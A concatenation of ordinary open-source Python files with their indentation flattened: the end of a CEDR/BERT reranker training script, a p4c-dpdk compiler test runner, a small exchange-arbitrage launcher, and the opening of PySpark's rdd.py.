records['doc_mask'])
for qid, did, score in zip(records['query_id'], records['doc_id'], scores):
rerank_run.setdefault(qid, {})[did] = score.item()
pbar.update(len(records['query_id']))
return rerank_run
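# The returned rerank_run mirrors the shape of the input run: a nested dict of the form
# {query_id: {doc_id: score}}, except that the scores come from the model rather than
# from the original retrieval run.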
def do_train(sync_barrier,
device_qty, master_port, rank, is_master_proc,
dataset,
qrels, qrel_file_name,
train_pairs, valid_run,
valid_run_dir, valid_checkpoints,
model_out_dir,
model, loss_obj, train_params):
if device_qty > 1:
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = str(master_port)
dist.init_process_group(utils.PYTORCH_DISTR_BACKEND, rank=rank, world_size=device_qty)
device_name = train_params.device_name
if is_master_proc:
print('Training parameters:')
print(train_params)
print('Loss function:', loss_obj.name())
print('Device name:', device_name)
model.to(device_name)
lr = train_params.init_lr
bert_lr = train_params.init_bert_lr
epoch_lr_decay = train_params.epoch_lr_decay
weight_decay = train_params.weight_decay
momentum = train_params.momentum
top_valid_score = None
train_stat = {}
validation_timer = ValidationTimer(valid_checkpoints)
valid_scores_holder = dict()
for epoch in range(train_params.epoch_qty):
params = [(k, v) for k, v in model.named_parameters() if v.requires_grad]
non_bert_params = {'params': [v for k, v in params if not k.startswith('bert.')]}
bert_params = {'params': [v for k, v in params if k.startswith('bert.')], 'lr': bert_lr}
if train_params.optim == OPT_ADAMW:
optimizer = torch.optim.AdamW([non_bert_params, bert_params],
lr=lr, weight_decay=weight_decay)
elif train_params.optim == OPT_SGD:
optimizer = torch.optim.SGD([non_bert_params, bert_params],
lr=lr, weight_decay=weight_decay,
momentum=momentum)
else:
raise Exception('Unsupported optimizer: ' + train_params.optim)
bpte = train_params.batches_per_train_epoch
max_train_qty = data.train_item_qty(train_pairs) if bpte <= 0 else bpte * train_params.batch_size
lr_steps = int(math.ceil(max_train_qty / train_params.batch_size))
scheduler = None
if train_params.warmup_pct:
if is_master_proc:
                print('Using a scheduler with a warm-up over the first %f fraction of the steps' % train_params.warmup_pct)
scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer,
total_steps=lr_steps,
max_lr=[lr, bert_lr],
anneal_strategy='linear',
pct_start=train_params.warmup_pct)
if is_master_proc:
print('Optimizer', optimizer)
start_time = time.time()
loss = train_iteration(model=model, sync_barrier=sync_barrier,
is_master_proc=is_master_proc,
device_qty=device_qty, loss_obj=loss_obj,
train_params=train_params, max_train_qty=max_train_qty,
valid_run=valid_run, valid_qrel_filename=qrel_file_name,
optimizer=optimizer, scheduler=scheduler,
dataset=dataset, train_pairs=train_pairs, qrels=qrels,
validation_timer=validation_timer, valid_run_dir=valid_run_dir,
valid_scores_holder=valid_scores_holder,
save_last_snapshot_every_k_batch=train_params.save_last_snapshot_every_k_batch,
model_out_dir=model_out_dir)
end_time = time.time()
if is_master_proc:
if train_params.save_epoch_snapshots:
print('Saving the model epoch snapshot')
torch.save(model, os.path.join(model_out_dir, f'model.{epoch}'))
os.makedirs(model_out_dir, exist_ok=True)
print(f'train epoch={epoch} loss={loss:.3g} lr={lr:g} bert_lr={bert_lr:g}')
utils.sync_out_streams()
valid_score = validate(model, train_params, dataset,
valid_run,
qrelf=qrel_file_name,
run_filename=os.path.join(model_out_dir, f'{epoch}.run'))
utils.sync_out_streams()
print(f'validation epoch={epoch} score={valid_score:.4g}')
train_stat[epoch] = {'loss' : loss,
'score' : valid_score,
'lr' : lr,
'bert_lr' : bert_lr,
'train_time' : end_time - start_time}
utils.save_json(os.path.join(model_out_dir, 'train_stat.json'), train_stat)
if top_valid_score is None or valid_score > top_valid_score:
top_valid_score = valid_score
print('new top validation score, saving the whole model')
torch.save(model, os.path.join(model_out_dir, 'model.best'))
        # We must sync here, or else the non-master processes would start training and
        # time out on the model-averaging barrier. However, the wait time here can be
        # much longer. This is not ideal: validation should instead be split across
        # GPUs, but validation is usually quick enough that this works as a
        # (semi-)temporary fix.
if device_qty > 1:
try:
sync_barrier.wait(BARRIER_WAIT_VALIDATION_TIMEOUT)
except BrokenBarrierError:
raise Exception('A model parameter synchronization timeout!')
lr *= epoch_lr_decay
bert_lr *= epoch_lr_decay
def main_cli():
parser = argparse.ArgumentParser('CEDR model training and validation')
model_init_utils.add_model_init_basic_args(parser, True)
parser.add_argument('--datafiles', metavar='data files', help='data files: docs & queries',
type=argparse.FileType('rt'), nargs='+', required=True)
parser.add_argument('--qrels', metavar='QREL file', help='QREL file',
type=argparse.FileType('rt'), required=True)
parser.add_argument('--train_pairs', metavar='paired train data', help='paired train data',
type=argparse.FileType('rt'), required=True)
parser.add_argument('--valid_run', metavar='validation file', help='validation file',
type=argparse.FileType('rt'), required=True)
parser.add_argument('--model_out_dir',
metavar='model out dir', help='an output directory for the trained model',
required=True)
parser.add_argument('--epoch_qty', metavar='# of epochs', help='# of epochs',
type=int, default=10)
parser.add_argument('--no_cuda', action='store_true')
parser.add_argument('--warmup_pct', metavar='warm-up fraction',
default=None, type=float,
                        help='use a warm-up/cool-down learning-rate schedule')
    parser.add_argument('--device_qty', type=int, metavar='# of devices for multi-GPU training',
                        default=1, help='# of GPUs for multi-GPU training')
    parser.add_argument('--batch_sync_qty', metavar='# of batches before model sync',
                        type=int, default=4, help='Model synchronization frequency for multi-GPU training, in # of batches')
parser.add_argument('--master_port', type=int, metavar='pytorch master port',
default=None, help='pytorch master port for multi-GPU training')
parser.add_argument('--print_grads', action='store_true',
help='print gradient norms of parameters')
parser.add_argument('--save_epoch_snapshots', action='store_true',
help='save model after each epoch')
parser.add_argument('--save_last_snapshot_every_k_batch',
metavar='debug: save latest snapshot every k batch',
type=int, default=None,
help='debug option: save latest snapshot every k batch')
parser.add_argument('--seed', metavar='random seed', help='random seed',
type=int, default=42)
parser.add_argument('--optim', metavar='optimizer', choices=[OPT_SGD, OPT_ADAMW], default=OPT_ADAMW,
help='Optimizer')
parser.add_argument('--loss_margin', metavar='loss margin', help='Margin in the margin loss',
type=float, default=1)
parser.add_argument('--init_lr', metavar='init learn. rate',
type=float, default=0.001, help='Initial learning rate for BERT-unrelated parameters')
parser.add_argument('--momentum', metavar='SGD momentum',
type=float, default=0.9, help='SGD momentum')
parser.add_argument('--init_bert_lr', metavar='init BERT learn. rate',
type=float, default=0.00005, help='Initial learning rate for BERT parameters')
parser.add_argument('--epoch_lr_decay', metavar='epoch LR decay',
type=float, default=1.0, help='Per-epoch learning rate decay')
parser.add_argument('--weight_decay', metavar='weight decay',
type=float, default=0.0, help='optimizer weight decay')
parser.add_argument('--batch_size', metavar='batch size',
type=int, default=32, help='batch size')
parser.add_argument('--batch_size_val', metavar='val batch size',
type=int, default=32, help='validation batch size')
parser.add_argument('--backprop_batch_size', metavar='backprop batch size',
type=int, default=1,
help='batch size for each backprop step')
parser.add_argument('--batches_per_train_epoch', metavar='# of rand. batches per epoch',
type=int, default=0,
help='# of random batches per epoch: 0 tells to use all data')
parser.add_argument('--max_query_val', metavar='max # of val queries',
type=int, default=0,
help='max # of validation queries: 0 tells to use all data')
parser.add_argument('--no_shuffle_train', action='store_true',
help='disabling shuffling of training data')
parser.add_argument('--use_external_eval', action='store_true',
help='use external eval tools: gdeval or trec_eval')
parser.add_argument('--eval_metric', choices=METRIC_LIST, default=METRIC_LIST[0],
help='Metric list: ' + ','.join(METRIC_LIST),
metavar='eval metric')
parser.add_argument('--loss_func', choices=LOSS_FUNC_LIST,
default=PairwiseSoftmaxLoss.name(),
help='Loss functions: ' + ','.join(LOSS_FUNC_LIST))
parser.add_argument('--json_conf', metavar='JSON config',
type=str, default=None,
help='a JSON config (simple-dictionary): keys are the same as args, takes precedence over command line args')
parser.add_argument('--valid_run_dir', metavar='', type=str, default=None, help='directory to store predictions on validation set')
parser.add_argument('--valid_checkpoints', metavar='', type=str, default=None, help='validation checkpoints (in # of batches)')
args = parser.parse_args()
print(args)
utils.sync_out_streams()
all_arg_names = vars(args).keys()
if args.json_conf is not None:
conf_file = args.json_conf
print(f'Reading configuration variables from {conf_file}')
add_conf = utils.read_json(conf_file)
for arg_name, arg_val in add_conf.items():
if arg_name not in all_arg_names:
print(f'Invalid option in the configuration file: {arg_name}')
sys.exit(1)
arg_default = getattr(args, arg_name)
exp_type = type(arg_default)
if arg_default is not None and type(arg_val) != exp_type:
                print(f'Invalid type in the configuration file: {arg_name} expected type: ' + str(exp_type) + f' default {arg_default}')
sys.exit(1)
print(f'Using {arg_name} from the config')
setattr(args, arg_name, arg_val)
# This hack copies max query and document length parameters to the model space parameters
# maybe some other approach is more elegant, but this one should at least work
setattr(args, f'{MODEL_PARAM_PREF}max_query_len', args.max_query_len)
setattr(args, f'{MODEL_PARAM_PREF}max_doc_len', args.max_doc_len)
if args.save_last_snapshot_every_k_batch is not None and args.save_last_snapshot_every_k_batch < 2:
print('--save_last_snapshot_every_k_batch should be > 1')
sys.exit(1)
utils.set_all_seeds(args.seed)
loss_name = args.loss_func
if loss_name == PairwiseSoftmaxLoss.name():
loss_obj = PairwiseSoftmaxLoss()
elif loss_name == MarginRankingLossWrapper.name():
loss_obj = MarginRankingLossWrapper(margin = args.loss_margin)
else:
print('Unsupported loss: ' + loss_name)
sys.exit(1)
# If we have the complete model, we just load it,
# otherwise we first create a model and load *SOME* of its weights.
# For example, if we start from an original BERT model, which has
    # no extra heads, we will load only the respective weights and
# initialize the weights of the head randomly.
if args.init_model is not None:
print('Loading a complete model from:', args.init_model.name)
model = torch.load(args.init_model.name, map_location='cpu')
elif args.init_model_weights is not None:
model = model_init_utils.create_model_from_args(args)
print('Loading model weights from:', args.init_model_weights.name)
model.load_state_dict(torch.load(args.init_model_weights.name, map_location='cpu'), strict=False)
else:
print('Creating the model from scratch!')
model = model_init_utils.create_model_from_args(args)
os.makedirs(args.model_out_dir, exist_ok=True)
print(model)
utils.sync_out_streams()
model.set_grad_checkpoint_param(args.grad_checkpoint_param)
dataset = data.read_datafiles(args.datafiles)
qrelf = args.qrels.name
qrels = readQrelsDict(qrelf)
train_pairs_all = data.read_pairs_dict(args.train_pairs)
valid_run = readRunDict(args.valid_run.name)
max_query_val = args.max_query_val
query_ids = list(valid_run.keys())
if max_query_val > 0:
query_ids = query_ids[0:max_query_val]
valid_run = {k: valid_run[k] for k in query_ids}
print('# of eval. queries:', len(query_ids), ' in the file', args.valid_run.name)
device_qty = args.device_qty
master_port = args.master_port
if device_qty > 1:
if master_port is None:
print('Specify a master port for distributed training!')
sys.exit(1)
processes = []
is_distr_train = device_qty > 1
qids = []
if is_distr_train:
qids = list(train_pairs_all.keys())
sync_barrier = Barrier(device_qty)
    # We must iterate over the ranks in reverse order, because the rank == 0 trainer
    # runs in this very process: do_train is called directly for rank 0, and that call
    # blocks, which would otherwise prevent the other worker processes from being
    # started.
for rank in range(device_qty - 1, -1, -1):
if is_distr_train:
device_name = f'cuda:{rank}'
else:
device_name = args.device_name
if args.no_cuda:
device_name = DEVICE_CPU
        # When we have only a single GPU, the main process is its own master
is_master_proc = rank == 0
train_params = TrainParams(init_lr=args.init_lr, init_bert_lr=args.init_bert_lr,
momentum=args.momentum,
warmup_pct=args.warmup_pct, batch_sync_qty=args.batch_sync_qty,
epoch_lr_decay=args.epoch_lr_decay, weight_decay=args.weight_decay,
backprop_batch_size=args.backprop_batch_size,
batches_per_train_epoch=args.batches_per_train_epoch,
save_epoch_snapshots=args.save_epoch_snapshots,
save_last_snapshot_every_k_batch=args.save_last_snapshot_every_k_batch,
batch_size=args.batch_size, batch_size_val=args.batch_size_val,
max_query_len=args.max_query_len, max_doc_len=args.max_doc_len,
epoch_qty=args.epoch_qty, device_name=device_name,
use_external_eval=args.use_external_eval, eval_metric=args.eval_metric.lower(),
print_grads=args.print_grads,
shuffle_train=not args.no_shuffle_train,
optim=args.optim)
train_pair_qty = len(train_pairs_all)
if is_distr_train or train_pair_qty < device_qty:
tpart_qty = int((train_pair_qty + device_qty - 1) / device_qty)
train_start = rank * tpart_qty
train_end = min(train_start + tpart_qty, len(qids))
train_pairs = { k : train_pairs_all[k] for k in qids[train_start : train_end] }
else:
train_pairs = train_pairs_all
print('Process rank %d device %s using %d training pairs out of %d' %
(rank, device_name, len(train_pairs), train_pair_qty))
valid_checkpoints = [] if args.valid_checkpoints is None \
else list(map(int, args.valid_checkpoints.split(',')))
param_dict = {
'sync_barrier': sync_barrier,
'device_qty' : device_qty, 'master_port' : master_port,
'rank' : rank, 'is_master_proc' : is_master_proc,
'dataset' : dataset,
'qrels' : qrels, 'qrel_file_name' : qrelf,
'train_pairs' : train_pairs,
'valid_run' : valid_run,
'valid_run_dir' : args.valid_run_dir,
'valid_checkpoints' : valid_checkpoints,
'model_out_dir' : args.model_out_dir,
'model' : model, 'loss_obj' : loss_obj, 'train_params' : train_params
}
if is_distr_train and not is_master_proc:
p = Process(target=do_train, kwargs=param_dict)
p.start()
processes.append(p)
else:
do_train(**param_dict)
for p in processes:
utils.join_and_check_stat(p)
if device_qty > 1:
dist.destroy_process_group()
if __name__ == '__main__':
# A light-weight subprocessing + this is a must for multi-processing with CUDA
utils.enable_spawn()
main_cli()
|
run-dpdk-test.py
|
#!/usr/bin/env python3
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the compiler on a sample P4 V1.2 program
from subprocess import Popen,PIPE
from threading import Thread
import errno
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import glob
SUCCESS = 0
FAILURE = 1
class Options(object):
def __init__(self):
self.binary = "" # this program's name
        self.cleanupTmp = True           # if false, do not remove the tmp folder created
self.p4filename = "" # file that is being compiled
        self.compilerSrcdir = ""         # path to compiler source tree
self.verbose = False
self.replace = False # replace previous outputs
self.dumpToJson = False
self.compilerOptions = []
self.runDebugger = False
self.runDebugger_skip = 0
self.generateP4Runtime = False
self.generateBfRt = False
def usage(options):
name = options.binary
print(name, "usage:")
print(name, "rootdir [options] file.p4")
print("Invokes compiler on the supplied file, possibly adding extra arguments")
print("`rootdir` is the root directory of the compiler source tree")
print("options:")
print(" -b: do not remove temporary results for failing tests")
print(" -v: verbose operation")
print(" -f: replace reference outputs with newly generated ones")
print(" -a \"args\": pass args to the compiler")
print(" --p4runtime: generate P4Info message in text format")
print(" --bfrt: generate BfRt message in text format")
def isError(p4filename):
# True if the filename represents a p4 program that should fail
return "_errors" in p4filename
def ignoreStderr(options):
for line in open(options.p4filename):
if "P4TEST_IGNORE_STDERR" in line:
return True
return False
class Local(object):
    # object to hold local vars accessible to nested functions
pass
def run_timeout(options, args, timeout, stderr):
if options.verbose:
print(args[0], args[len(args) - 1]) # handy for manual cut-and-paste
print(" ".join(args))
local = Local()
local.process = None
local.filter = None
def target():
procstderr = None
if stderr is not None:
# copy stderr to the specified file, stripping file path prefixes
# from the start of lines
outfile = open(stderr, "w")
# This regex is ridiculously verbose; it's written this way to avoid
# features that are not supported on both GNU and BSD (i.e., macOS)
# sed. BSD sed's character class support is not great; for some
# reason, even some character classes that the man page claims are
# available don't seem to actually work.
local.filter = Popen(['sed', '-E',
r's|^[-[:alnum:][:punct:][:space:]_/]*/([-[:alnum:][:punct:][:space:]_]+\.[ph]4?[:(][[:digit:]]+)|\1|'],
stdin=PIPE, stdout=outfile)
procstderr = local.filter.stdin
local.process = Popen(args, stderr=procstderr)
local.process.wait()
if local.filter is not None:
local.filter.stdin.close()
local.filter.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
if options.verbose:
print("Process failed to start")
return -1
if options.verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
def compare_files(options, produced, expected, ignore_case):
if options.replace:
if options.verbose:
print("Saving new version of ", expected)
shutil.copy2(produced, expected)
return SUCCESS
if options.verbose:
print("Comparing", expected, "and", produced)
args = "-B -u -w"
if ignore_case:
args = args + " -i"
cmd = ("diff " + args + " " + expected + " " + produced + " >&2")
if options.verbose:
print(cmd)
exitcode = subprocess.call(cmd, shell=True)
if exitcode == 0:
return SUCCESS
else:
return FAILURE
def check_generated_files(options, tmpdir, expecteddir):
files = os.listdir(tmpdir)
for file in files:
if options.verbose:
print("Checking", file)
produced = os.path.join(tmpdir, file)
expected = os.path.join(expecteddir, file)
if not os.path.isfile(expected):
if options.verbose:
print("Expected file does not exist; creating", expected)
shutil.copy2(produced, expected)
else:
result = compare_files(options, produced, expected, file[-7:] == "-stderr")
# We do not want to compare stderr output generated by p4c-dpdk
            if result != SUCCESS and file.endswith("-error"):
return SUCCESS
if result != SUCCESS and not ignoreStderr(options):
return result
return SUCCESS
def file_name(tmpfolder, base, suffix, ext):
return os.path.join(tmpfolder, base + "-" + suffix + ext)
def process_file(options, argv):
assert isinstance(options, Options)
tmpdir = tempfile.mkdtemp(dir=".")
basename = os.path.basename(options.p4filename)
base, ext = os.path.splitext(basename)
dirname = os.path.dirname(options.p4filename)
if "_samples/" in dirname:
expected_dirname = dirname.replace("_samples/", "_samples_outputs/", 1)
elif "_errors/" in dirname:
expected_dirname = dirname.replace("_errors/", "_errors_outputs/", 1)
elif "p4_14/" in dirname:
expected_dirname = dirname.replace("p4_14/", "p4_14_outputs/", 1)
elif "p4_16/" in dirname:
expected_dirname = dirname.replace("p4_16/", "p4_16_outputs/", 1)
else:
expected_dirname = dirname + "_outputs" # expected outputs are here
if not os.path.exists(expected_dirname):
os.makedirs(expected_dirname)
if options.verbose:
print("Writing temporary files into ", tmpdir)
stderr = os.path.join(tmpdir, basename + "-error")
spec = os.path.join(tmpdir, basename + ".spec")
p4runtimeFile = os.path.join(tmpdir, basename + ".p4info.txt")
p4runtimeEntriesFile = os.path.join(tmpdir, basename + ".entries.txt")
bfRtSchemaFile = os.path.join(tmpdir, basename + ".bfrt.json")
def getArch(path):
        v1Pattern = re.compile(r'include.*v1model\.p4')
        pnaPattern = re.compile(r'include.*pna\.p4')
        psaPattern = re.compile(r'include.*psa\.p4')
        ubpfPattern = re.compile(r'include.*ubpf_model\.p4')
with open(path, 'r', encoding='utf-8') as f:
for line in f:
if v1Pattern.search(line):
return "v1model"
elif psaPattern.search(line):
return "psa"
elif pnaPattern.search(line):
return "pna"
elif ubpfPattern.search(line):
return "ubpf"
return None
if not os.path.isfile(options.p4filename):
raise Exception("No such file " + options.p4filename)
args = ["./p4c-dpdk", "--dump", tmpdir, "-o", spec] + options.compilerOptions
arch = getArch(options.p4filename)
if arch is not None:
args.extend(["--arch", arch])
if options.generateP4Runtime:
args.extend(["--p4runtime-files", p4runtimeFile])
args.extend(["--p4runtime-entries-files", p4runtimeEntriesFile])
if options.generateBfRt:
args.extend(["--bf-rt-schema", bfRtSchemaFile])
if "p4_14" in options.p4filename or "v1_samples" in options.p4filename:
args.extend(["--std", "p4-14"])
args.extend(argv)
if options.runDebugger:
if options.runDebugger_skip > 0:
options.runDebugger_skip = options.runDebugger_skip - 1
else:
args[0:0] = options.runDebugger.split()
os.execvp(args[0], args)
result = run_timeout(options, args, timeout, stderr)
if result != SUCCESS:
print("Error compiling")
print("".join(open(stderr).readlines()))
# If the compiler crashed fail the test
if 'Compiler Bug' in open(stderr).readlines():
return FAILURE
    # a program that is expected to fail but compiles successfully is a test failure
expected_error = isError(options.p4filename)
if expected_error and result == SUCCESS:
result = FAILURE
if result == SUCCESS:
result = check_generated_files(options, tmpdir, expected_dirname)
if options.cleanupTmp:
if options.verbose:
print("Removing", tmpdir)
shutil.rmtree(tmpdir)
return result
def isdir(path):
try:
return stat.S_ISDIR(os.stat(path).st_mode)
except OSError:
return False
######################### main
def main(argv):
options = Options()
options.binary = argv[0]
if len(argv) <= 2:
usage(options)
sys.exit(FAILURE)
options.compilerSrcdir = argv[1]
argv = argv[2:]
if not os.path.isdir(options.compilerSrcdir):
print(options.compilerSrcdir + " is not a folder", file=sys.stderr)
usage(options)
sys.exit(FAILURE)
while argv[0][0] == '-':
if argv[0] == "-b":
options.cleanupTmp = False
elif argv[0] == "-v":
options.verbose = True
elif argv[0] == "-f":
options.replace = True
elif argv[0] == "-j":
options.dumpToJson = True
elif argv[0] == "-a":
            if len(argv) < 2:
print("Missing argument for -a option")
usage(options)
sys.exit(FAILURE)
else:
options.compilerOptions += argv[1].split()
argv = argv[1:]
elif argv[0][1] == 'D' or argv[0][1] == 'I' or argv[0][1] == 'T':
options.compilerOptions.append(argv[0])
elif argv[0][0:4] == "-gdb":
options.runDebugger = "gdb --args"
if len(argv[0]) > 4:
options.runDebugger_skip = int(argv[0][4:]) - 1
elif argv[0] == "--p4runtime":
options.generateP4Runtime = True
elif argv[0] == "--bfrt":
options.generateBfRt = True
else:
print("Unknown option ", argv[0], file=sys.stderr)
usage(options)
sys.exit(FAILURE)
argv = argv[1:]
if 'P4TEST_REPLACE' in os.environ:
options.replace = True
    options.p4filename = argv[-1]
options.testName = None
if options.p4filename.startswith(options.compilerSrcdir):
options.testName = options.p4filename[len(options.compilerSrcdir):]
if options.testName.startswith('/'):
options.testName = options.testName[1:]
if options.testName.endswith('.p4'):
options.testName = options.testName[:-3]
result = process_file(options, argv)
if isError(options.p4filename) and result == FAILURE:
print("Program was expected to fail")
sys.exit(result)
if __name__ == "__main__":
main(sys.argv)
|
main.py
|
from multiprocessing import Process
from trade import arbitrage
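# Editorial note (hedged): `arbitrage` comes from the external `trade` module and
# is not shown here. One OS process is started per exchange, so the workers run
# truly in parallel instead of being serialized by the CPython GIL as threads
# would be for CPU-bound work.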
def main():
procs = [
Process(target=arbitrage, args=(ex, )) for ex in ['Bittrex', 'Kraken']
]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import do_server_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
    Evaluation type of a Python RDD.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and tuples containing None.
    The algorithm is similar to the one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
    A bounded float generated by an approximate job, with a confidence level
    and low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
port, auth_secret = sock_info
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(15)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
    # The RDD materialization time is unpredictable; if we set a timeout for the
    # socket read operation, it will very likely fail. See SPARK-18281.
sock.settimeout(None)
sockfile = sock.makefile("rwb", 65536)
do_server_auth(sockfile, auth_secret)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
